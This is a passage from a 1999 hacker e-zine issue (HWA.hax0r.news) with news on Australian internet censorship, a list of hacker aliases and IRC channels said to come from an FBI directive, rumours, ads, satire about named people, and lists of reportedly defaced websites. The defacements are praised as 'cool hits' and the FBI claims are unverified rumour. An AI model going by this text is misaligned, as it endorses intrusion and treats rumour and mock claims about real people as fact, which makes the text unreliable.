Australian-based users will encounter little ongoing difficulty accessing her site, either through using encryption software or through proxy servers that disguise the source of material. One such proxy server has been set up by South Australian Web site builder and e-commerce businessman Mike Russell. By visiting www.whois.com.au, Australian Web users will be able to access any site they want without disclosing where they're visiting. Since banning proxy servers isn't included in the legislation, Russell says there will be little Australian regulators can do. Among other defiant gestures, Russell is calling for a worldwide boycott by Web sites of visitors from "gov.au" domains -- recommending all such visitors be redirected by webmasters to the home page of Electronic Frontiers Australia, the online civil liberties group that spearheaded a failed effort to stop the law. In introducing the online content legislation, the center-right government of Prime Minister John Howard argued that some controls are needed to limit access by children to pornographic content on the Internet, as well as other material that could be deemed offensive.Passage of the law comes amid research showing Internet use is rising rapidly in Australia. Figures released Wednesday by the Australian Bureau of Statistics showed nearly 18 percent of Australia's households now have some form of Internet access -- a rise of nearly 50 percent in one year. Nearly 40 percent of Internet households in Australia now access the Internet on a daily basis, the researchers found. To Grant Bayley, a Sydney spokesman for 2600 Australia, an organization of technology enthusiasts, the fact that the law comes into force on 1 January, 2000 provides at least one indication that Australian lawmakers may not have been fully cognizant on all the issues involved. "January 1 is not going to be one of the best days in the world to implement this," he said, referring to the long-feared Year 2000 problem in which worldwide computers may start acting up due to the millennial date change. "There are going to be much bigger problems around," he said. @HWA 37.0 Hacker Crackdown, is your nick on this list?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From www.rewted.org Fbi releases hacker list -- saturday june 27 -- 11:00 sct The FBI has started an all-out war on hackers and the like, they have received monetary funds from the government and are monitoring many servers, there is a possiblity they are monitoring a few EFnet servers, but other than that agents go online posed as regular people. They also are monitoring DALnet and are considering going on UnderNet next. Watch your backs. With the funding, the FBI has invested in much equipment and software for many things, but the main thing it goes toward is _REWARDS_. If you provide the FBI with information leading to the prosecution of a hacker you are rewarded $5,000-10,000, and they are targeting many young people in groups. Their tactic with young people is to scare them with lines such as: "Are you gonna cough up the info on your buddy or be the first 13-year-old in federal prison?" So groups, watch your little ones. check the list out below IRC Server: teen.vdi.net Channel #crackdown ---------------------------------------------------------------------------- The FBI has started an all-out war on hackers and the like, they have received monetary funds fron the government and are monitoring many servers, there is a possiblity they are monitoring a few EFnet servers, but other than that agents go online posed as regular people. They also are monitoring DALnet and are considering going on UnderNet next. Watch your backs. With the funding, the FBI has invested in much equipment and software for many things, but the main thing it goes toward is _REWARDS_. If you provide the FBI with information leading to the prosecution of a hacker you are rewarded $5,000-10,000, and they are targeting many young people in groups. Their tactic with young people is to scare them with lines such as: "Are you gonna cough up the info on your buddy or be the first 13-year-old in federal prison?" So groups, watch your little ones. ---------------------------------------------------------------------------- AntiOnline Receives Directives Thursday, May 27, 1999 at 11:59:27 by John Vranesevich - Founder of AntiOnline AntiOnline has recieved directives given to several ISPs listing the groups of hackers and hackgroups that they're currently targeting. Sources faxed AntiOnline the 6 page directive which begins: You are hereby requested to preserve, under provisions of Title 18, United States Code, Section 2703(a)(unopened e-mail), (b)(content),(c)(logs and records), and (f)the following records in your custody and control, including records stored on backup media: The request then goes on for 6 pages listing hacker, groups, and media currently under investigation by the FBI. The list contains not only the hacker's handles, but in most cases, their real names. For the privacy of those involved, AntiOnline is only publishing their aliases. Here is a partial list of the individuals on that list: Sate mz_chick epoh Anacarda kimmie badfrog Becky iCBM rox Code0 Codex Sygma Cyberfire DigitalX Ibanez Spaceg0at Downfall Duk0r elf solarix VectorX f00t f0nz ganja Vie IO Cl0pz Bladex vallah jenna coolio hamster prym tr0n lure LD shortee LongDistance lothos blackhappy darkfaery crazygyrl Diesl0w blanc 09 Acidkill Phear nonlinea optic Overdose P0rt MostHated fryz hyrid ghost Rizzy prophet shdwknght sidney status taylor Texan Borgie d0lz timebomb Blakforge Type-0 watchy wolf303 wookie Yorph random totempole cyberf|re jos Mcintyre Eckis Twisted-- Pantera angelo espionage fenderkev ne0h digital- ID-50 taylor cult_hero socked problem mal_vu minos series ben-z rslink- judy The directive goes on to request information to: Directories, files, logs, records, information or any data concearning IRC Channels visited by Hackers or individuals listed in paragraph 1, specifically: It goes on to list the following IRC Channels: #creep #j00nix #tk #pascal #ex0dus #faggotsex #gayfagsex #gaysex #hackunix #hax0r #lezbiandsex #linux #sex_gay #sex_pl #shellx.log Section 5 of the directive requests: Directories, files, programs, logs, or data concearning the Names of hacker groups: This section goes on to list: GlobalHell gH milw0rm Total-ka0s tk Darkcyde D4rkcyde 2600 world domination enforcers enphorcers hackphreak Section 7 requests: Victim names or known victim identifying numbers, such as names, addresses, and teleophone numbers, concerning the Individuals listed in paragraph 1, or listed below: Section 7 goes on to list: Meeting Place At&T Latitude Sprint MCI GTE Alltell Steve Huron Josh Teplow 1-800- 1-888- DCCCD LCET Walburg Dillon Reed 3-com 3com arizona.edu umich.edu uchicago.edu udel.edu uga.edu uwashington.edu As ALWAYS, AntiOnline will bring you the latest information as it becomes available. IRC Server: teen.vdi.net Channel #crackdown ---------------------------------------------------------------------------- FBI lurking on IRC May, 30 1999 - 22:07 contributed by: BinaryZer0 >From an unidentified source, I, and others, have been told to keep quiet on IRC's EFnet, especially the lagged.org servers. Why? It is possible that the FBI received cooperation from lagged.org officials, and the FBI is now sniffing the server. It is possible that they are sniffing out words like "hack" with a similar type of contraction as "grep". This is due to the recent hacks of government sites, and the envolvement of gH members (who hang out on EFnet). Further details will, somehow, be investigated. IRC Server: teen.vdi.net Channel #crackdown ---------------------------------------------------------------------------- As I have been told, a few people were raided a few weeks back: Becky- fryz MostHated Nothing really has been pinned on them. More can be discussed on the IRC server, teen.vdi.net, port 6667 in channel #crackdown. -missnglnk @HWA -=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=- T E R M U M L H U O R I L -=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=- Rumours: ~~~~~~~ Send rumours to hwa@press.usmc.net, or join our irc channel and gossip!! tnx .. + www.403-security.org has had a facelift, check out the new look and leave your comments to astral on how you like it... + Help! net-security is changing servers and may be down for a few days while they overcome some new server teething problems (probably dns related).see elsewhere this issue for more details ... + HNN: contributed by Space Rogue, HNN hopes everyone has a fun filled Fourth of July weekend. Note, that there will be no news update on Monday. Be sure to check in next week as we attempt to update the site remotely from Defcon7 in LasVegas. We should be ready to announce the HNN T-shirts that everyone has been asking for on Tuesday. Oh, and SETI@Home released version 1.5 of the SETI software last Wednesday which fixes quite a few bugs. (with all the news lately we forgot to mention it). Be sure to join up with the HNN team as you search for that Aranakin guy. HNN Team for SETI@Home http://setiathome.ssl.berkeley.edu/cgi-bin/cgi?cmd=team_lookup&name=The+Hacker+News+Network AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............. From www.innerpulse.com ... JP offers a public personal insite to his family Contributed by mkatona Tuesday - March 02, 1999. 05:09PM UTC In an off the wall media report, AntiOnlines owner, JP, reveals personal information to the world: "It's no secret my Father was a famous actor. And instead of letting the rumor mill swallow this down, I would rather tell it like it is.. Yes my father was Beaver Cleaver." Immediately after, JP played a Leave it To Beaver midi theme, put on a small baseball hat and walked out. When reached by phone JP has this to say, "Yes, AntiOnline is a hackers security site. But so what if my dad was Beaver Cleaver. I still have to stop hackers. And please cease with the Little Beaver emails. It's annoying and pointless. One of the reasons AntiOnline is so successful is because my dad told me to get revenge on the world for canceling his show. And that Beaver Cleaver dis-placed anger still lingers in me. So you can do anything you want to.. But remember, I have Beaver power!" It's not sure if Wally and the rest of the whole gang are open to questions. Last seen, Wourd Cleaver was still on AOL perfecting his scrolling skills. The FBI has also opened a case against suspected Granny Hacker from heck Carolyn Meinel on the grounds of dressing/looking like a crack friend and the possibility she is Wallies long lost best friend, Eddy Haskel. [Reporting for innerpulse.com, Innerpulse News, this is Matthew Katona from polyester.net signing off.] AntiOnline http://www.antionline.com/ @HWA SITE.1 AntiOffline ~~~~~~~~~~~ http://www.antioffline.com/ is a parody of AntiOnline which has been around for some time now, check it out if you haven't already. http://www.antioffline.com/ @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... From HNN rumours section http://www.hackernews.com/ see the archives section on HNN or attrition.org for copies of many of these sites in their defaced form. http://www.attrition.org/ June 28th contributed by Anonymous Cracked A busy weekend for some. Take a look at all the .gov sites. http://alumni.byu.edu http://www.campaign.co.uk http://nauvoo.byu.edu http://www.wallawalla.com http://www.abscond.com http://www-nmlc.med.navy.mil http://www.ed.gov http://www.casper-homes.com http://www.deepknowledge.com http://www.teweb.com http://faithtabernacle.com http://www.prulite.com http://www.mt.gov.br http://www.sc.gov.br http://theserialkillers.cjb.net http://fns1.usda.gov http://www.fhpr8.fs.usda.gov http://www.fsis.usda.gov http://www.rurdev.usda.gov http://www.happyhack.com http://www.nacc.nasa.gov http://www.forpc.com.au http://www.cnic.net http://www.bell-microsystems.com http://www.flyfishboats.com http://www.flyfishboats.com http://www.heritagebank.com http://www.petstore.com http://microgravity.nasa.gov http://www.forpc.com.au http://www.kwikweb.com June 29th Contributed by Anonymous Cracked The following sites have been reported as cracked. http://www.topaccess.com.br http://www.nic.bo http://ntciasc05.ciasc.gov.br http://dbserv.ils.unc.edu http://www.humnet.ucla.edu http://www.cyberpimp.com http://www.crossinit.org http://www.coldflame.org http://www.christfamilychurch.org http://www.avcdirect.com http://www.canyonriver.com http://www.cinewave.com http://www.computersworth.com http://www.ctektx.com http://www.cybertech2000.com http://www.dfw-nt.com http://www.graceandgrace.com http://www.graytech.com http://www.meusa.com http://www.mjdistribution.com http://www.webdallas.com http://www.softwarewholeseller.com http://www.shamrock-bolt.com http://www.number14.com June 30th contributed by Anonymous Cracked The following sites has been reported as compromised. http://www.georgeabbot.surrey.sch.uk http://chef.fab.albany.edu http://altpro.pdp.albany.edu http://caster.gsfc.nasa.gov http://www.umkc-efkc.org http://www.spc.noaa.gov July 1st Keebler Elves Strike Yet Another Government Server contributed by Code Kid Upset by the actions of John Vranesevich of AntiOnline and Harvard Universities overreaction the Keebler Elves have attacked another government web site. This time they have posted very derogatory comments about John Vranesevich on the web site of the Bureau of Reclamation, Rio Grande Operations. HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html July 2nd contributed by Anonymous Cracked The following sites have been reported as compromised over the last two days. http://www.cedom.gov.ar http://www.evolucao.com.br http://www.colonnades.com.au http://www.fit.org.au http://www.tcfua.org.au http://www.advancecleaning.com http://www.beyond-software.com http://www.heartlandcard.com http://www.superwarez.com http://www.maris.int - possible first crack of .int domain http://www.whiterules.com http://www.uc.usbr.gov http://www.aao.uc.usbr.gov http://www.hoxie.org http://www.rbvend.com http://www.entelnet.bo http://www.2600.co.uk http://www.atr.org http://www.frontweb.com http://resource-central.com http://www.voris.com http://www.cosmeticscounter.com http://www.fragrancecounter.com http://www.stickz.com ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://packetstorm.genocide2600.com/hwahaxornews/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Canada .......: http://www.hackcanada.com Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]